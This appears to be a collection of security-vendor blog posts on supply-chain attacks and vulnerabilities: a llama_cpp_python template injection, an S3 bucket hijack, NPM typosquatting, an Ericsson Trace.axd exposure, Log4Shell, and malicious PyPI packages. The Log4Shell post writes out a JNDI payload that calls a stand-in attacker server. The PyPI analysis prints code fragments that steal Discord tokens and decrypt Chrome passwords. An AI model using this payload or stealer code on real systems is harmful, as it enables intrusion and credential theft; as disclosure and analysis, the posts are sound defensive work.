Vulnerability

Llama Drama: Critical Vulnerability CVE-2024-34359 Threatening Your Software Supply Chain

Guy Nachshon — Thu, 16 May 2024 15:21:11 +0000

Key Points

The critical vulnerability CVE-2024-34359 has been discovered by retr0reg in the “llama_cpp_python” Python package.
This vulnerability allows attackers to execute arbitrary code from the misuse of the Jinja2 template engine.
Over 6k AI models om HuggingFace using llama_cpp_python and Jinja2 are vulnerable.
A fix has been issued in v0.2.72
This vulnerability underscores the importance of security in AI systems and software supply chain.

Imagine downloading a seemingly harmless AI model from a trusted platform like Hugging Face, only to discover that it has opened a backdoor for attackers to control your system. This is the potential risk posed by CVE-2024-34359. This critical vulnerability affects the popular llama_cpp_python package, which is used for integrating AI models with Python. If exploited, it could allow attackers to execute arbitrary code on your system, compromising data and operations. Over 6,000 models on Hugging Face were potentially vulnerable, highlighting the broad and severe impact this could have on businesses, developers, and users alike. This vulnerability underscores the fact that AI platforms and developers have yet to fully catch up to the challenges of supply chain security.

Understanding Jinja2 and llama_cpp_python

Jinja2: This library is a popular Python tool for template rendering, primarily used for generating HTML. Its ability to execute dynamic content makes it powerful but can pose a significant security risk if not correctly configured to restrict unsafe operations.

`llama_cpp_python`: This package integrates Python’s ease of use with C++’s performance, making it ideal for complex AI models handling large data volumes. However, its use of Jinja2 for processing model metadata without enabling necessary security safeguards exposes it to template injection attacks.

[image: jinja and llama]

What is CVE-2024-34359?

CVE-2024-34359 is a critical vulnerability stemming from the misuse of the Jinja2 template engine within the `llama_cpp_python` package. This package, designed to enhance computational efficiency by integrating Python with C++, is used in AI applications. The core issue arises from processing template data without proper security measures such as sandboxing, which Jinja2 supports but was not implemented in this instance. This oversight allows attackers to inject malicious templates that execute arbitrary code on the host system.

The Implications of an SSTI Vulnerability

The exploitation of this vulnerability can lead to unauthorized actions by attackers, including data theft, system compromise, and disruption of operations. Given the critical role of AI systems in processing sensitive and extensive datasets, the impact of such vulnerabilities can be widespread, affecting everything from individual privacy to organizational operational integrity.

The Risk Landscape in AI and Supply Chain Security

This vulnerability underscores a critical concern: the security of AI systems is deeply intertwined with the security of their supply chains. Dependencies on third-party libraries and frameworks can introduce vulnerabilities that compromise entire systems. The key risks include:

Extended Attack Surface: Integrations across systems mean that a vulnerability in one component can affect connected systems.
Data Sensitivity: AI systems often handle particularly sensitive data, making breaches severely impactful.
Third-party Risk: Dependency on external libraries or frameworks can introduce unexpected vulnerabilities if these components are not securely managed.

A Growing Concern

With over 6,000 models on the HuggingFace platform using `gguf` format with templates—thus potentially susceptible to similar vulnerabilities—the breadth of the risk is substantial. This highlights the necessity for increased vigilance and enhanced security measures across all platforms hosting or distributing AI models.

Mitigation

The vulnerability identified has been addressed in version 0.2.72 of the llama-cpp-python package, which includes a fix enhancing sandboxing and input validation measures. Organizations are advised to update to this latest version promptly to secure their systems.

Conclusion

The discovery of CVE-2024-34359 serves as a stark reminder of the vulnerabilities that can arise at the confluence of AI and supply chain security. It highlights the need for vigilant security practices throughout the lifecycle of AI systems and their components. As AI technology becomes more embedded in critical applications, ensuring these systems are built and maintained with a security-first approach is vital to safeguard against potential threats that could undermine the technology’s benefits.

Hijacking S3 Buckets: New Attack Technique Exploited in the Wild by Supply Chain Attackers

Guy Nachshon — Thu, 15 Jun 2023 12:00:00 +0000

Without altering a single line of code, attackers poisoned the NPM package “bignum” by hijacking the S3 bucket serving binaries necessary for its function and replacing them with malicious ones. While this specific risk was mitigated, a quick glance through the open-source ecosystem reveals that dozens of packages are vulnerable to this same attack.

Malicious binaries steal the user id’s, passwords, local machine environment variables, and local host name, and then exfiltrates the stolen data to the hijacked bucket.

Intro

A few weeks ago, a Github advisory was published reporting malware in the NPM package “bignum”.

The advisory depicted the interesting way in which the package was compromised.

The latest version of “bignum”, 0.13.1, was published more than 3 years ago and had never been compromised. However, several prior versions were.

Versions 0.12.2-0.13.0 relied upon binaries hosted on an S3 bucket. These binaries would get pulled from the bucket upon installation to support the functioning of the package. About 6 months ago, this bucket was deleted (the versions relying on it were mostly out of use).

This opened the bucket to a takeover, which resulted in the incident we are going to dive into.

What are “S3 Buckets”?

An S3 bucket is a storage resource provided by Amazon Web Services (AWS) that allows users to store, and retrieve, vast amounts of data over the Internet. It functions as a scalable, and secure, object storage service, storing files, documents, images, videos, and any other type of digital content. S3 buckets can be accessed using unique URLs, making them widely used for various purposes such as website hosting, data backup and archiving, content distribution, and application data storage.

The Beginning: Hijacking an Abandoned S3 Bucket

An NPM package, named “bignum” was found to leverage “node-gyp” for downloading a binary file during installation. The binary file was initially hosted on an Amazon AWS S3 bucket, which, if inaccessible, would prompt the package to look for the binary locally.

However, an unidentified attacker noticed the sudden abandonment of a once-active AWS bucket. Recognizing an opportunity, the attacker seized the abandoned bucket. Consequently, whenever bignum was downloaded or re-installed, the users unknowingly downloaded the malicious binary file, placed by the attacker.

It is important to note that each AWS S3 bucket must have a globally unique name. When the bucket is deleted, the name becomes available again. If a package pointed to a bucket as its source, the pointer would continue to exist even after the bucket’s deletion. This abnormality allowed the attacker to reroute the pointer toward the taken-over bucket.

The Attack: Malicious Binary with Dual Functions

This counterfeit. node binary mimicked the functions of the original file. It carried out the usual and expected activities of the package. Still, undetected by the user, it also added a malicious payload that waws designed to steal user credentials and send them to the same hijacked bucket. The exfiltration was craftily performed within the user-agent of a GET request.

The Reversal: Unmasking the Hidden Functions

The malicious .node file — essentially a C/C++ compiled binary — can be invoked within JavaScript applications, bridging JavaScript and native C/C++ libraries. This allows Node.js modules to tap into more performant lower-level code and opens a new attack surface regarding potential malicious activity.

Reverse engineering the compiled file was no small task. Scanning the file using virus total did not yield any results, since it was not detected as malware. However, when looking at the strings contained within the file, it is easy to see that there is some weird behavior, so I had to dive deep into the assembly.

Starting with an endless list of byte additions to registries, comparisons, and data movements that initially seemed pointless, the reversing effort finally paid off – a URL was constructed by individually reversing the string parts.

Further investigation revealed that the binary file harvested data via functions like getpwd and getuid (as seen in the strings printout), extracting environmental data. It then created a TCP socket for IPv4 communication and covertly sent the collected data as a user-agent of a ‘GET’ request.

The Ripple Effect

Since it was the first time such an attack was observed, we conducted a quick search across the open-source ecosystem. The results were startling. We found numerous packages and repositories using abandoned S3 buckets that are susceptible to this exploitation.

The impact of this novel attack vector can vary significantly. However, the danger it poses can be huge if an attacker manages to exploit it as soon as this kind of change occurs. Another risk is posed to organizations or developers using frozen versions or artifactories as they will continue to access the same, now hijacked, bucket.

The Verdict

This new twist in the realm of subdomain takeovers serves as a wake-up call to developers and organizations. It underscores the need for stringent checks and monitoring of package sources, and associated hosting resources.

An abandoned hosting bucket or an obsolete subdomain is not just a forgotten artifact; in the wrong hands, it can become a potent weapon for data theft and intrusion.

Proactive Step to Prevent Future Hijacks

To prevent this attack from occurring elsewhere, we took over all the deserted buckets inside open-source packages we found in our search. Now when someone tries to reach the files hosted in these buckets, they will receive a disclaimer file we planted inside those buckets.

Summary

Attackers keep finding creative ways to poison our software supply chain, and this is a reminder of how fragile our supply chain processes are.

We need to understand that relying on software dependencies to deliver compiled parts in build time may inadvertently deliver malware if an attacker takes over its storage service.

We would like to thank the maintainer of the package Rod Vagg and Caleb Brown at Google for their cooperation and assistance with this investigation.

IOC

Bignum v0.13.0:

MD5: 1e7e2e4225a0543e7926f8f9244b1aab
SHA-1: b2e1bffff25059eb38c58441e103e8589ab48ad3
SHA-256: 3c6793de04bfc8407392704b3a6cef650425e42ebc95455f3c680264c70043a7

Bignum v0.12.5:

MD5: f671a326b56c8986de1ba2be12fae2f9
SHA-1: ab97d5c64e8f74fcb49ef4cb3a57ad093bfa14a7
SHA-256: 3ba3fd7e7a747598502c7afbe074aa0463a7def55d4d0dec6f061cd3165b5dd1

Introducing Fusion 2.0 with Application Risk Management

Sonia Antao — Mon, 05 Jun 2023 19:26:14 +0000

Risk management is an essential part of securing any digital transformation effort. The growth in use of cloud-native applications and microservices architecture is driving a broader industry trend toward more applications. For AppSec teams, the movement to different dev teams working simultaneously on different launch schedules has caused a marked growth in complexity. Or, put more simply: things are getting really hard out there for AppSec teams.

In response, more companies are purchasing more tools to place security controls at multiple points across the software development lifecycle (SDLC). However, the number of tools in places doesn’t necessarily equate to a decrease in development time or efficiencies in other resources. More tools often just mean more vulnerabilities, and AppSec teams are notoriously understaffed and under-resourced to manage risks effectively.

Risk management: No pain, no gain?

AppSec teams do not always know where to start when assessing and managing risk. Most teams have multiple tools that provide different outputs in different formats. Orchestrating diverse data sets such as these can be a daunting task; but identifying, assessing, and mitigating the biggest risks is essential to protecting your business.

How do organizations begin assessing their risk? The first step is usually to conduct a comprehensive risk assessment. Once the risks are identified, they need to be evaluated based on their likelihood of being exploited and potential impact of that exploitation. This evaluation is often a highly manual process, but it allows organizations to prioritize risks and allocate resources accordingly to create a risk mitigation strategy.

The process often involves implementing new controls and safeguards, transferring risks through insurance, or accepting certain risks within predefined tolerance levels. Selecting an appropriate risk mitigation strategy depends on the specific risk and the organization’s risk appetite.

This process can be tedious, and since it’s not just a one-time process, it is often a significant pain point for AppSec managers, developers, and organizations. It requires many moving parts, and if there is no centralized place to keep and share the findings, risks can go “detected,” but unnoticed.

Don’t Forget to Optimize the “Developer Experience”

In addition to their risk management responsibilities, AppSec teams need to maintain a strong relationship with one of their most important internal customers and partners: development teams. To build a successful AppSec program, the developers must be brought onboard.

Developers are pressured to prioritize time to market. While creating secure code is becoming a more important part of their responsibilities, it is not their primary focus. According to our recent Pulse Survey, 35% of developers are experiencing increasing demands and shorter timelines to release new software, and 86% of respondents have released known-vulnerable code to meet launches.

We all know that developers don’t necessarily want to use additional security tools, and certainly don’t want to use the individual dashboards in those security tools. Supporting developers through strong developer experience is essential not just to the success of application security programs, but also to the overall processes and tools that allow organizations to shift security everywhere.

For AppSec teams, the “developer experience” means providing developers the opportunity to have a better security experience. When working with AppSec tools, developers often become overwhelmed with the constant “noise versus signal” decision making that is often put on their plate because it is unclear what risks they need to prioritize. Sorting through the noise and attempting to prioritize quickly can become a huge waste of time for each individual developer – leading to large drops in productivity. This in turn can cause a rift between developers and AppSec teams that could take extra time and resources to attempt to fix. When working with security tools, developers need to trust the results they get and see the most important things for them to fix first.

At Checkmarx, we’ve specifically developed tools to help:

Introducing: Application Risk Management as part of Fusion 2.0

Last year we introduced Fusion, which correlated and prioritized vulnerabilities across every AST engine on Checkmarx One. Now, Fusion 2.0 adds Application Risk Management – a module that will allow you to view the application security posture of your entire application portfolio and footprint.

Users will be able to start with a comprehensive risk score for all their applications, so AppSec managers can see quickly what needs to be addressed first. With this solution, AppSec managers can efficiently manage and prioritize vulnerabilities by providing a centralized and consolidated view of security risks. This instantly removes the complexity that a disorganized risk management process can carry with it. Once AppSec managers can zero in on the riskiest applications, teams can point developers to critical vulnerabilities that need remediation (like you could in Fusion 1.0).

This new feature allows AppSec teams to truly prioritize and triage the most critical vulnerabilities on the riskiest applications. It allows us to create a better developer experience, since we now are giving clear signals as to where the highest impact areas are, instead of having them waste their time wading through the noise.

Successful risk management requires constant vigilance. Regular monitoring allows organizations to identify changes in the risk landscape, while also allowing for timely remediation against emerging critical risks. Unnoticed and unmediated vulnerabilities can open a proverbial Pandora’s box when it comes to exploits – the longer a critical risk remains unaddressed, the greater the potential for malicious users to take advantage of it. We all know that time is money, and no one knows this better than bad actors. Our risk management feature also includes an unaddressed critical risk timer, which will let AppSec managers and developers know the time elapsed on unaddressed critical risks.

Most important though, is that a robust risk management system can help create a culture of resilience within organizations and AppSec teams. When businesses are aware of what risks they are facing, they can proactively make better decisions in a regard to how they can navigate certain challenges and capitalize on other opportunities. Application risk management is a fundamental part of a robust risk management practice since it helps your AppSec teams do it better.

Ready to learn more? Check out the new Application Risk Management module for Checkmarx One!

Introducing AI Query Builder for SAST

Avi Hein — Wed, 31 May 2023 11:31:31 +0000

How SAST is customized for different applications

Today, Checkmarx SAST provides tremendous flexibility to scan applications based on how they are built. This is done using two constructs:

Queries: essentially a rule that identifies a potential vulnerability.
Presets: a collection of queries optimized for a specific type of application (for example, a mobile app) that defines the scope of the SAST scan. We’ve written elsewhere about working with presets.

Queries are building blocks for identifying potential vulnerabilities and critical for filtering through the noise to avoid sending false positives and false negatives to your developers. Understanding queries enables AppSec teams and developers to prioritize your efforts, and promptly address the most critical issues.

Checkmarx SAST includes pre-built queries (and presets) written in the Checkmarx Query Language (CxQL). These identify common security issues such as SQL injection, cross-site scripting, and insecure access controls and provide an easy way to start securing applications out of the box.

Customizing queries for your unique applications

Checkmarx is the only solution in the market that allows for queries to be customized – either by creating new custom queries or customizing existing queries.

Custom queries provide a uniquely flexible and powerful mechanism to tailor your SAST tool solution to specific application requirements. They provide the freedom to explore unique or specific code structures that pre-built rules may not cover adequately.

For example, as we wrote in an earlier post:

A common use case that neatly highlights the benefits of customizing queries can be found in cross-site scripting (XSS) vulnerability findings where a false positive may be occurring due to the use of an in-house sanitizer method that is not included in the Checkmarx One default out-of-the-box query. We can simply add this method to the appropriate CxQL query and rescan the project to remove the FP.

AI enters the room

Unless you’ve been living under a rock, you’ve probably heard about AI and the impact that it’s having across every industry. In tech, many developers have embraced AI and are already using AI to generate their code. But even more so, according to a recent IDC survey(1) , developers believe that software quality and testing (22.5%) and security testing and vulnerability management (21.5%) have the most potential to benefit from Generative AI.

Making custom queries more accessible with AI

Today, Checkmarx introduced AI Query Builder for SAST. This feature lets Checkmarx One users harness the power of AI to automatically generate new custom queries or modify existing ones. AI Query Builder builds on the custom query capability, allowing AI to help any AppSec team write new or edit existing custom queries. This allows every organization to tune SAST more easily for your applications, increasing accuracy and minimizing false positives and false negatives.

AI Query Builder is an expert in the ins and outs of CxQL. You no longer need to be an expert in building a query when an AI can do the work for you! With this feature, a simple prompt such as, “Help me generate a Checkmarx query that will detect an authentication issue,” will immediately generate a new custom query.

Benefits of AI-Generated Custom Queries

Some benefits of using artificial intelligence to generate custom queries include:

Comprehensive coverage: AI Query Builder can use existing public SAST documentation and security best practices to generate custom queries that cover a broader range of potential vulnerabilities. This reduces the risk of making mistakes or missing critical issues.
Enhanced efficiency: Save time and effort – instead of manually crafting queries, AppSec managers and developers can engage with AI Query Builder to generate tailored queries, reducing time spent on query development.
Fewer false positives: False positives are always a challenge for any AppSec solution, but AI-generated custom queries can improve accuracy and reduce false positives.

Everyone can use it : No longer are custom queries reserved for power users, but now every Checkmarx One user can now better tune their SAST solution using AI.

Try it yourself.

Interested in seeing for yourself?

Join the Checkmarx Early Access program.

We’re just beginning. Check in next week when we’ll have a new blog post taking us through AI Query Builder for IaC Security.

(1) Source: IDC, Generative AI Adoption and Attitudes: A Survey of U.S. Developers, Doc #US50655123, May 2023

Ericsson Sensitive Data Exposure via Trace.axd

David Sopas — Thu, 25 May 2023 11:00:00 +0000

Research by David Sopas and João Morais

Checkmarx Security Research team reached out to Ericsson’s Responsible Disclosure Program, notifying them of the the finding on 14th March 2023. Ericsson acknowledged the finding and replied that the issue was fixed on 11th April 2023.

ASP.NET web applications that run with tracing enabled, may publicly expose sensitive information. This feature allows any user to view diagnostic information about a single request for an ASP.NET page. When this feature is enabled, Trace Viewer (Trace.axd) may be publicly accessible, without server’s root authentication. The Checkmarx Security Research team discovered this vulnerability and will explore what that means for users in this post.

This research was conducted following Ericsson Vulnerability Disclosure Program.

One of Ericsson’s subdomains is forecast.ericsson.net. However, when accessing it via a web browser it redirects to https:// forecast.ericsson.net /Login /Login. aspx. No complex reconnaissance process was required to understand that we were dealing with an ASP.NET web application.

There are several, well-known endpoints/resources of interest to check for when dealing ASP.NET web applications, and – /Trace.axd is one of them. Trace.axd is a web-page that is intended to provide extensive logging information in regard to web requests to the application. – If this is exposed, it may provide attackers unauthenticated access to the last 80 web requests made to the server. This has the potential to result in a sensitive information, such as PII data, and session details being disclosed. This information may then be used to potentially take over user accounts, and further compromise Ericsson’s applications.

After finding Trace Viewer (Trace.axd) on our target subdomain (https://forecast.ericsson.net/Trace.axd), we checked what information was available.

The picture above shows the Trace Viewer main page (Trace.axd), which is where the physical directory of the web application (E:webrootsSupplyExtranet) and the last requested web application files are printed (Supply/ChangePassword.aspx).

As you can see, it is possible to view additional details for each request. This potentially can allow malicious actors access to sensitive information. The body of POST requests, especially those to the Login/Login.aspx endpoint, are good candidates to monitor for disclosure sensitive information, including usernames and passwords. We can see this scenario, where user account credentials, username and password, are both shown in plaintext in the figure below.

Information disclosure via Trace Viewer (Trace.axd) for ASP.NET web applications is a high severity security issue that can lead to the compromise of sensitive information and online systems. This feature should not be enabled in production environments.

A new, stealthier type of Typosquatting attack spotted targeting NPM

Tzachi Zornstein — Tue, 09 May 2023 11:00:00 +0000

Research done by Teach Zornstein and Yehuda Gelb

Intro

In the evolving world of cybersecurity, attackers are always looking for new ways to exploit weaknesses and compromise systems. Attackers have been using lowercase letters in package names on the Node Package Manager (NPM) registry for potential malicious package impersonation. This deceptive tactic presents a dangerous twist on a well-known attack method — “Typosquatting.” In this blog post, we will explore the origins of this issue, the risks it poses, and the steps that were taken to address it while also examining its relationship to Typosquatting.

A Brief History of Package Naming in NPM

Prior to 2017 NPM package creators were allowed to use both upper and lowercase letters in their package names. However, in 2017, NPM changed its policy, and new packages could only be created with lowercase letters. Despite this change, existing packages with mixed-case names were allowed to remain on the registry and are still in use to this day. In fact, there are thousands of mixed-case packages still available, collectively accounting for tens of millions of downloads.

The Impersonation Threat

Bad actors can easily exploit this situation by uploading packages with names that closely resemble legitimate packages, simply by using lowercase letters to mimic uppercase letters in the original package names. This tactic is intended to trick users into downloading, and installing, the malicious package instead of the intended legitimate one.

For instance, consider these two packages:

Legitimate package

Removed for security reasons

The only difference between the two package names is the capitalization of the “S” and “D” in “memoryStorageDriver.” Malicious users hope that unsuspecting users will unintentionally install the wrong package, due to the close resemblance in their names.

A stealthier approach to Typosquatting:

This malicious package impersonation takes the traditional “Typosquatting,” attack method to a new level, where attackers register package names that consist of the exact same letters as the legitimate ones, with the only difference being capitalization. This makes it even harder for users to detect the deception since it can be easy to overlook the subtle differences in capitalization.

The Scope of the Problem:

3,815 packages were found on NPM containing uppercase letters. Out of these, 1,900 packages were at risk of impersonation, meaning that someone could upload a package with the same name but with all lowercase letters. Some of the at-risk packages were quite popular, such as “objectFitPolyfill,” which has hundreds of thousands of weekly downloads. In total, the download count of the packages at risk is in the tens of millions.

Popular vulnerable package on NPM (capital letters used in the package name)

Package name “objectFitPolyfill” in all lowercase letters available for anyone to use in a new package

How do other Package Managers compare with NPM?

To better understand the malicious package impersonation issue in NPM, let’s compare how other popular package managers, such as PyPI and NuGet, handle this issue.

Both PyPI and NuGet adopt more robust strategies for dealing with package names containing uppercase and lowercase letters. For example, let’s take a package named “ExamplePackage” published on PyPI or NuGet. Unlike NPM, these package managers allow package creators to upload packages with names containing both upper and lowercase letters. Once “ExamplePackage” is published, PyPI and NuGet will restrict anyone else from uploading a package with the same name, regardless of the capitalization of letters. This means that a package named “examplepackage” or “Examplepackage” cannot be uploaded by someone else, preventing bad actors from exploiting package name variations.

In addition, PyPi and NuGet have implemented an automatic typo-correction mechanism to assist users who accidentally type package names with incorrect capitalization. By employing these measures, PyPI and NuGet significantly reduce the chances of users falling victim to deceptive tactics. This approach provides a more secure environment for package distribution and installation.

Addressing the Issue

The issue was brought to the attention of the NPM security team, who promptly acknowledged and effectively addressed the concern. Now, if anyone attempts to upload packages that use all lowercase letters to imitate existing uppercase letters, they will be met with an error message that reads, “Package name too similar to existing package.”

Package health checks: Users can check package health prior to installation. For example, Overlay Browser Extension can alert you if a package has known security issues or vulnerabilities, based on the latest advisories from trusted sources. By using tools like this, you can ensure that the package you are installing is secure and reliable.

Raising awareness: We are dedicated to spreading awareness about attacks such as these and their potential impacts. By sharing our findings with the community, we aim to educate users and developers about the risks involved and the precautions they can take.

Conclusion

It is important to emphasize how easy it is to fall for this type of attack. It’s as simple and subtle as a change in capitalization. This vulnerability highlights the importance of staying vigilant and being aware of evolving tactics employed by bad actors. By understanding the risks, users can take appropriate precautions. The matter was reported to the NPM security team, who quickly recognized and efficiently resolved the issue.

Apache Log4j Remote Code Execution – CVE-2021-44228

Alex Livshiz — Sun, 12 Dec 2021 17:03:48 +0000

On December 9th, the most critical zero-day exploit in recent years was discovered affecting most of the biggest enterprise companies. This critical 0-day exploit was discovered in the extremely popular Java logging library log4j which allows RCE (Remote code execution) by logging a certain payload.

This vulnerability is also known as CVE-2021-44228 which has a CVSS (Common Vulnerability Scoring System) score of 10, which is the highest risk possible and was published by GitHub advisory with a critical severity level.

According to Google’s open-source scorecard project, which calculate a health score for open-source repositories, log4j received 4.8 (from 1-10, 10 being the best score).

How to remediate the Log4j RCE vulnerability?

The easiest and most recommended way to remediate this vulnerability is to update to log4j version 2.15.0 or later.
If updating the package is an issue, then in previous releases 2.10.0 through 2.15.0, this exploitable behavior can be mitigated by setting the system property to:

log4j2.formatMsgNoLookups=true

Additionally, an environment variable can be set for these same affected versions:

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

For releases from 2.0-beta9 to 2.10.0, removing JndiLookup class from the classpath would be the solution. The command to perform such action is:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

You can find more details in the GitHub commit that fixes this vulnerability.

Why is it so critical?

Amazon, Apple, Twitter, Minecraft, Cloudflare, Steam: this is only a very partial list of organizations that are impacted by this vulnerability.

According to New Zealand CERT (Computer Emergency Response Team) and Greynoise monitoring service, attackers are actively looking for vulnerable servers to exploit this attack, and there are more than 100 distinct hosts that are scanning the internet in order to find ways to exploit such vulnerability.

The impact is wide-scale as log4j is an extremely common logging library used across most Java applications, including in business systems to record log information.

Less than 24 hours after the publication of this vulnerability, there was already a crypto-miner deployed that took advantage of this vulnerability.

Am I vulnerable?

You can freely check if your domain is vulnerable to CVE-2021-44228 using open-source testing tools, like GitHub – huntresslabs/log4shell-tester for example.

Also, in case your application uses log4j below 2.15.0 as a direct package or transitive package, you are vulnerable.
Another way to verify is to check these hashes in your software inventory, in case you find them, you use vulnerable log4j in your systems:

GitHub – mubix/CVE-2021-44228-Log4Shell-Hashes: Hashes for vulnerable LOG4J versions

As of Monday, December 13th, 2021 13:00 CET, a workaround was found to bypass the trustURLCodebase=false setting. To be as secure as possible, we recommend updating your log4j library, instead of relying on any of the other patches.

Source: Fastly

How does it work?

First, let us dive deeper to understand the components used in this attack: JNDI (Java Naming and Directory Interface) is a Java API (Application Programming Interfaces) for a directory service that allows you to interface with LDAP or DNS (Domain Name Service) to look up data and resources.

LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol used for directory services authentication.

From the Java official documentation, we can see an example of communicating with the LDAP server to retrieve attributes from an object.

The LDAP server could be located anywhere on the internet, which means that if an attacker could control the LDAP URL, he would be able to load an object using a Java program, under a server in his control.

Exploiting CVE-2021-44228

This attack is a combination of multiple vectors:

Lack of Input validation
Unauthenticated SSRF
Lack of whitelisting protocols for JNDI client

log4j uses special syntax in the form of ${prefix:name} where prefix is a lookup and name is evaluated.
For example, ${java:version} is the currently running version of Java.

In this case, by overriding the ${prefix:name} prefix, the attacker could trigger the server to send a malicious request via the lookups function. This occurs due to the lack of validation of the prefix special syntax offered by log4j. By adding a custom prefix, an attacker could control the type of protocol, as for this attack it is LDAP. We should point out that the main logic for this attack vector (controlling the input in a JNDI lookup function) is a known exploit and it was published a few years ago – https://github.com/welk1n/JNDI-Injection-Exploit

A Possible PoC

One of the data types that might be returned is a URL pointing to a Java class, which might be an untrusted class, which runs a malicious actor’s code.

An example of logger that logs HTTP (HyperText Transfer Protocol) information:

LOGGER.warn("Request User-Agent: {}", userAgent);

An attacker might insert the payload to the User-Agent header:

User-Agent: ${jndi:ldap://AttackerServer.com/}

In this scenario, the vulnerable log4j server will make an LDAP query to AttackerServer.com.

AttackerServer.com will then respond with directory information containing the malicious_class attributes:

javaClassName:

javaCodeBase:

objectClass: javaNamingReference

javaFactory:

The javaFactory and javaCodeBase values are then used to build the object location that contains the Java class representing the final payload.

The Java class will be loaded into memory and executed by the vulnerable log4j server.

For example, an attacker could create a class that uses an object which returns the results of any command, like ls, to an external URL.

The logger will evaluate the payload, call the malicious attacker server, and fetch the code written in the object.

Exploitable path:

The vulnerability described in CVE-2021-44228 is caused by log4j-core’s jndiLookup functionality, which log4j-api does not provide and so it is not vulnerable by itself for the log4shell vulnerabilities. However, log4j-api package provides the interface and the adapter components required for implementing log4j-core’s logging capabilities.

These functions are reached by the following logger functions, which are defined in the Logger.java file:

Logger.debug()
Logger.error()
Logger.warn()
Logger.fatal()
Logger.info()
Logger.trace()
Logger.log()

CxSCA Mitigation

Checkmarx offers CxSCA, which enables your organization to address open-source security issues earlier in the SDLC (Software Development Life Cycle) and cut down on manual processes by scanning your code, identifying the security risk it contains, so you can deliver secure & compliant software faster and at scale. SBOM (software bill of materials) automation at scale seems like the need of the hour for anyone that uses open source code.

For a free demonstration of CxSCA, please contact us here.

Recently Discovered Supply-chain Worm

Aviad Gershon — Thu, 09 Dec 2021 13:58:57 +0000

Malicious Python Packages with Self-spreading Capabilities Caught Stealing Browser Credentials, Discord Tokens, and System Information.

The malicious package is able to steal the user’s password from their Chrome browser, along with Discord tokens and system information, and exfiltrate this data via a Discord webhook. Beyond that, the malicious package also has the ability to automatically self-spread by sending itself as an attachment to the victim’s friends on the Discord platform.

Typosquatting attacks, which rely on errors like typos being inputted into installation commands, are a common way to mislead developers to download the wrong package that can often include malicious functionalities.

This incident was discovered by Checkmarx’s CxDustico group. CxDustico was acquired earlier this year by Checkmarx and is focused on supply-chain security. The group’s Typosquatting attack detection engine has detected the “discrod” PyPi package, masquerading as “discord”, an API wrapper for the popular Discord massaging app. The same user also uploaded the “cszsafsa” package, which turned out to be malicious as well, and with an ability to self-spread and infect the victim’s Discord friends.

Checkmark has alerted PyPi’s security team, and the packages were removed from the package manager. According to PePy, these two packages were downloaded more than 4,000 times before they were removed.

Detailed Report

“discrod” package

first released in June 2021, the “discrod” package had two functionalities:

Stealing Discord tokens
- A discord token is a string stored in the browser or app local storage upon first login, and enables an automatic re-login. Hence, this string functions as an authorizing key that will enable anyone possessing it to gain extensive access to the relevant Discord account. As such, these are attractive targets to attackers.
- “discrod” package code iterates over files these tokens might be stored in, and tries to retrieve them by using a simple regular expression matching the token pattern since they are stored as plain text with no encryption.

def tokengrab(ext):

    local = os.getenv('LOCALAPPDATA')
    roaming = os.getenv('APPDATA')

    paths = {
        'Discord': roaming + 'Discord',
        'Discord Canary': roaming + 'discordcanary',
        'Discord PTB': roaming + 'discordptb',
        'Google Chrome': local + 'GoogleChromeUser DataDefault',
        'Opera': roaming + 'Opera SoftwareOpera Stable',
        'Brave': local + 'BraveSoftwareBrave-BrowserUser DataDefault',
        'Yandex': local + 'YandexYandexBrowserUser DataDefault'
}

Stealing password stored in the Chrome browser
- Contrary to that, the Chrome browser does encrypt the passwords it holds before storing them on disk; therefore, the malicious package code first tries to retrieve the master encryption key.
- Having done that, the attacker locates the “Login Data” database and queries it for all login details it stores. The attacker then iterates over the results and decrypts the passwords using the master encryption key.

def main2():

    key = get_encryption_key()

    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default", "Login Data")
    filename = "ChromeData.db"
    shutil.copyfile(db_path, filename)
    db = sqlite3.connect(filename)
    cursor = db.cursor()

    cursor.execute(
        "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
        
    for row in cursor.fetchall():
        origin_url = row[0]
        action_url = row[1]
        username = row[2]
        password = decrypt_password(row[3], key)
        date_created = row[4]
        date_last_used = row[5]

Tokens and passwords found by these processes are then sent to the attacker via Discord webhook.

Some clues in this package’s code indicate that this isn’t the last version the attacker intended to publish, and that there is still work to be done. For example, each time the attacker sends data through the Discord webhook, they do it twice, probably as a redundancy, with what should have been two different webhooks. The problem here is that the second variable that should contain the webhook’s address isn’t defined, which makes the code error out.

Even more interesting are the flags set at the beginning of the code, some unused, implying new features that have yet to be implemented, such as keylogging.

token_grabber = True
ip_grabber_f = True
key_logger = True

The next step we took was searching for other packages this user, 69.-_69, may have uploaded to PyPi. When doing so, we stumbled upon “cszsafsa”, another malicious package uploaded on September 21, and it seems to be an upgraded version of “discrod”.

“cszsafsa” Package Details

Let’s start from the end. After looking at this package’s code, we realized it strikes a remarkable resemblance to another piece of software we have already seen before, the dTGPG (Discord Token Grabber Payload Generator).

According to the Pastebin page it is found in, dTGPG is a python script used to generate other code in numerous languages with the functionality of a Discord Token Grabber.

The “cszsafsa” package code is largely copied from the code on this Pastebin page. Looking back, it’s pretty clear that the attacker used snippets of this code in the “discrod” package as well.

The first thing we noticed is the fact that this upgraded version can also run on Linux OS, but other than that, there were some new functionaries in addition to the one we saw on the “discrod” package:

If the detected OS is Windows, the code will run two functions: mar() and main().

The mar() function is the same Chrome passwords stealer found on “discrod”, with minor adjustments. The main() function is an improved version of the Discord token grabber with the following additions:

Collects system information
Collects Discord Profile information
Exfiltrate tokens, Discord profile, and system information via Discord webhook
A self-spreading mechanism – Sends the file itself to all the victim’s friends on Discord

The attacker chooses to lure the victim’s friends to run the payload sent to them by claiming it is a DDOS tool and attached to it the python download page

“DDoS tool. python download: https://www.python.org/downloads”

But that has no effect because the spreading functionality isn’t activated. The first instruction inside the “spread” function is “return”, which means that the rest of the function code will never be executed, and the infecting massage won’t be sent.

def spread(token, form_data, delay):
    return
    for friend in getFriends(token):
        try:
            chat_id = getChat(token, friend["id"])
            sendMessages(token, chat_id, form_data)
        except Exception as e:
            pass
        sleep(delay)

If the detected OS is Linux, the code will run the “stuff” function which is a Linux modified version with the same functionalities as the Windows main() function, minus the spreading mechanism, for example:

Collects system information
Collects Discord Profile information
Exfiltrate tokens, Discord profile, and system information via Discord webhook

